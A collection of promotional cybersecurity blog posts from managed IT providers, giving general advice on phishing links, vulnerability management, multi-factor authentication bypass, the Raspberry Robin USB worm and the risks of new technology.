Received a Random Link? DO NOT CLICK ON IT!

a person is typing on a laptop computer

If you ever receive random texts or emails from PayPal (or any other business, for that matter) telling you they suspended your account and now require you to authenticate your identity with an unknown link, then you should definitely think twice before clicking on that link. This is a common method that hackers use to break into accounts, especially those account holders that fall for this phishing scam. There is a better alternative to investigate this issue to see where it leads. It is important to access your account the way you normally would instead of clicking on that link.

If you were in this position, what would you do?

It is pretty safe to say that no one wants to fall for a phishing scam; but, at the same time, it can be very tempting to trust the message to make sure there is nothing wrong with your account.

The best approach is simple, but definitely not one that we would intuitively think to do.

Instead of clicking on the link provided in the text or email, open up a new web browser tab and login to the website, the same way you normally would in order to access your account. It does not matter the type of account you are trying to log into, whether it be your bank, your favorite online retailer, or any website that you have an account with. The practice of logging into the site directly, rather than using the link given, is simple and easy to do. It will also help keep you from being a victim of a phishing attack.

Let Us Help Your Team and Keep Them Safe

4 Corner IT can help you and your company choose the best tools and resources to keep everyone safe from security and phishing attacks. Our professionals can help build your business’ defenses and offer training to all members of your team, including how to identify potential threats and the best practices to keep safe from these attacks. For more information or to get started today, contact us at 954.474.2204.

Contact Us Today and Check Out Our Blog!

Enterprise Businesses and Vulnerabilities

businesses

It is no secret how vital cybersecurity is for all organizations today. Recent data has shown just how crucial visibility into your company’s infrastructure really is. Today, most businesses have IT solutions to assist with detecting and managing their information systems vulnerabilities. These vulnerabilities can range from a bug in a code that can allow hackers to gain access to a flaw in the update that might fix one vulnerability but cause another. Enterprises face viruses, malware, spam, and phishing schemes. With the number of options available, IT professionals must learn how to manage these vulnerabilities and the types of solutions that will best fit the company. 

Enterprise Vulnerabilities are Pretty Bad

Sevco Security recently released a report, The State of the Cybersecurity Attack Surface, that gathered data from over 500,000 IT companies. This report found that many of the assets that these businesses relied on were missing critical endpoint protections or lacking critical checkpoints.

Research showed that from the businesses that were interviewed, 12% of the companies lacked endpoint protection services while 5% lacked enterprise patch management. It was also found that 19% of Windows servers were also missing endpoint protections.

These companies also demonstrated assets that were recognized by the security control console and registered as installed on a device, even though that device is not checking back in. This is an issue that many organizations deal with as 3% of IT assets showed stale endpoint protections with 1% showing stale patch management. Because of this, issues are more difficult to find and resolve before creating problems because devices are supposedly checked out and approved.

IT professionals should conduct proper research on all the available vulnerability management tools to find the appropriate ones to use. It is essential to look for a tool that allows automated scanning, alerting, and tracking of vulnerabilities over time. The tracking helps ensure that these vulnerabilities are patched as soon as possible. Vulnerability management tools should be pretty easy to set up and begin functioning as soon as possible. 

The four critical criteria of vulnerability management, also known as VM, are network discovery, scanning, reporting and correlation, and asset prioritization. It is important to ensure that you have an IT department that will always maintain your company’s infrastructure. If needed, you can also outsource vulnerability management to another IT team that will assist in protecting your organization’s infrastructure.

We Can Help Prevent Your Business from Experiencing These Issues

At AE Technology Group, our remote monitoring and maintenance are created in order to identify and solve IT problems before they can interrupt business operations. For more information or to find out how we can assist your company, contact us today at (516) 536-5006.

Contact Us Today!

Hackers Are Discovering Cracks in Multi-Factor Authentication

a person using a cell phone and laptop computer

Multi-factor authentication, or MFA, is an effective practice in preventing cyberthreats. Unfortunately, and not surprisingly at all, hackers have found a way around MFA. Continue reading to learn how hackers found defects in multi-factor authentication and how to keep you and your company protected.

Why is Multi-Factor Authentication so effective?

The most common method hackers use to gain access to accounts is through phishing scams where they convince users to voluntarily provide login information like passwords and usernames. Although not as common, hackers guess frequently used weak passwords and might be successful. Either way, the secondary credential required by MFA means there is another level of security which helps prevent hackers from accessing accounts and personal information.

How are hackers getting around Multi-Factor Authentication?

Microsoft informed users of the recent attacks that have shown it is possible for hackers to find alternate ways around multi-factor authentication protocols. Hackers do not necessarily break through MFA but they are able to bypass inputting credentials required by MFA.

The most common way of bypassing MFA is through the use of “adversary-in-the-middle” attacks. In this attack, hackers use a phishing scam in tandem with a proxy server between the victim and the service he or she is logging into. Hackers are then able to steal the user’s password and the session cookie. The user is able to gain access to his or her account and has no idea that he or she was just hacked. In reality, the hacker just received access to the user’s account.

Other methods that are used to work around Multi-Factor Authentication

There are other means that hackers use to bypass multi-factor authentication but it may take time and effort. If a particular system uses SMS messages or email codes and the hacker was able to obtain the user’s login credentials, then the hacker can gain access to the account without having to answer the secondary credential.

Hackers can also bypass MFA by using trojans to spy on users or to take control of certain devices used to authenticate a system. If the account’s login portal depends on something the user knows, such as a code, hackers can attempt to get in.

What is the best approach?

The best defense against hackers and other attacks is to educate people on how hackers work and the most appropriate and effective security solutions to incorporate. It is recommended to implement multi-factor authentication. It is also crucial to teach employees the importance of MFA and other security solutions.

AE Technology Group can help you and your organization implement the best security solutions on the market. We can also provide extensive training and testing for your team to be prepared to handle any and all phishing attacks. To learn more about how we can help your business, contact us today at (516) 536-5006.

The Raspberry Robin Worm

raspberry robin

Utilizing storage devices, such as USB drives, has been known to spread malware from one device to another. Recent analyses found an imminent threat, known as the Raspberry Robin worm, is currently developing. What is it and how can you keep yourself and your company safe from attacks?

What is Raspberry Robin?

Raspberry Robin is a worm that was initially discovered in Europe in September 2021 by cybersecurity intelligence analysts at Red Canary. It was found to primarily affect users of Windows-operating systems.

What exactly does Raspberry Robin do?

When an infected USB drive is inserted into a computer, the device will display an infected .LNK file. A msiexec process is then started through the command prompt. A .BAT file has two commands that can be executed. One command can manage various Windows features and the other command can configure Open Database Connectivity. The combination of the two will make the threat difficult to locate on the network as it remains hidden.

The Raspberry Robin infection process was found to escalate further where compromised QNAP NAS (Network-Attached Storage) devices are also affected. During this stage, the hacker is able to retrieve the victim’s user and device names, using HTTP requests, once the .LNK file is downloaded. From the infected QNAP device, the malware then utilizes a malicious DLL (Dynamic-Link Library) in order to gain access and take control over the entire system.

How does Raspberry Robin spread?

Although it is understood that Raspberry Robin spreads via compromised USB drives, it’s unclear how it spreads from device to device.

What are hackers looking for?

Unfortunately, like most malware that are in its initial stages of development, there is not much known about Raspberry Robin. More research is required to determine its spreadability and the intention hackers may have when creating this worm. Although it is currently unknown, it is suspected that hackers developed this attack with the intent to steal data and/or install additional viruses on infected devices.

The Final Takeaway

To keep yourself and your business safe from Raspberry Robin is to treat all USB devices with intense scrutiny. This includes eliminating inserting USB drives that do not belong to you or USB devices that might have been found lying around on the ground. It is important to remember that USB drives may not look suspicious from the outside but inside, it can be compromised. Always think twice before plugging in any unknown devices on your computers. 

AE Technology Group can help your organization keep itself protected from the various and growing threats out there, including this Raspberry Robin worm. Although we’re unable to physically stop your team from inserting potentially infected USB devices, we can provide further education, including the dangers of doing so, as well as training for employees. In addition, we will continuously track your network environment for possible threats. To learn more about how we can keep your business safe, please contact us at (516) 536-5006.

Advanced Technology Cybersecurity Risks and What to Do About It

cyber security

Cybersecurity for modern businesses is always attempting to stay ahead of the increasingly more complex security threats from hackers and cybercriminals. Companies will continue to invest in technology to enhance their business. As technology evolves, so do the cyber security threats that can infiltrate a business’s network. No company is immune, where smaller enterprises or large government agencies, even with today’s securities.

The Risks of Modern Technology

Technology such as the Internet of Things (IoT), artificial intelligence, cloud services, and more allow businesses to streamline their processes and accomplish more efficiently and accurately in a shorter timeline. With more technology comes greater risk as cyber criminals consistently innovate and find new ways to steal data from businesses of any size. 

Advancements such as automation remove human error and provide a more efficient way of doing business, but it doesn’t come without increased risks. Cybercriminals have highly sophisticated tools and capabilities using the very technology that businesses use to streamline their processes. 

When your business invests in technology, it’s important to invest in robust and aggressive cyber security that protects data and your business’s networks. A comprehensive review of your cybersecurity practices should be reviewed regularly. You want to consider the following: 

  • Do your employees have enough training to be an asset rather than a vulnerability?
  • Are the security measures currently in place enough to protect your business against threats and risks? 
  • Is your business prepared and looking ahead at the developing and evolving cyber threats and risks that are likely to emerge with new technologies?

The Current Evolving Threat Landscape

If your business is going to be prepared for advanced threats, it’s important to stay up to date with the current threats that can impact your business. Here are a few ideas on how to protect your business from developing threats.

Malware – Malware is becoming increasingly harder to find. Malware is getting better at mimicking user behavior as it is better at hiding their actions. To fight this threat, you need to ensure your team is trained to be able to spot malware or use automated security solutions to help you catch malware before it becomes a major problem.

More Technology Means More Vulnerability – More technology may be beneficial for businesses, but more technology means you have more to protect from attacks. Increased risk management and streamlining technologies to make IT less complex can help protect your business. 

Increase Upper Management Awareness – Often in companies, the upper levels of the corporate hierarchy remain blissfully unaware of the security issues and threats as they believe these risks are to be handled by the IT team. Cyber attacks can impact any level of a business, and it’s important to ensure everyone, including high-level executives, have a base awareness of the threats and what to look for. 

Need Help Securing Your Business

Working with us as your managed IT service can help ensure your data is protected against any cybersecurity threat your business may encounter. You can get back to focusing on running your business while we focus on protecting your business from cyber threats. To learn more, give us a call at (516) 536-5006.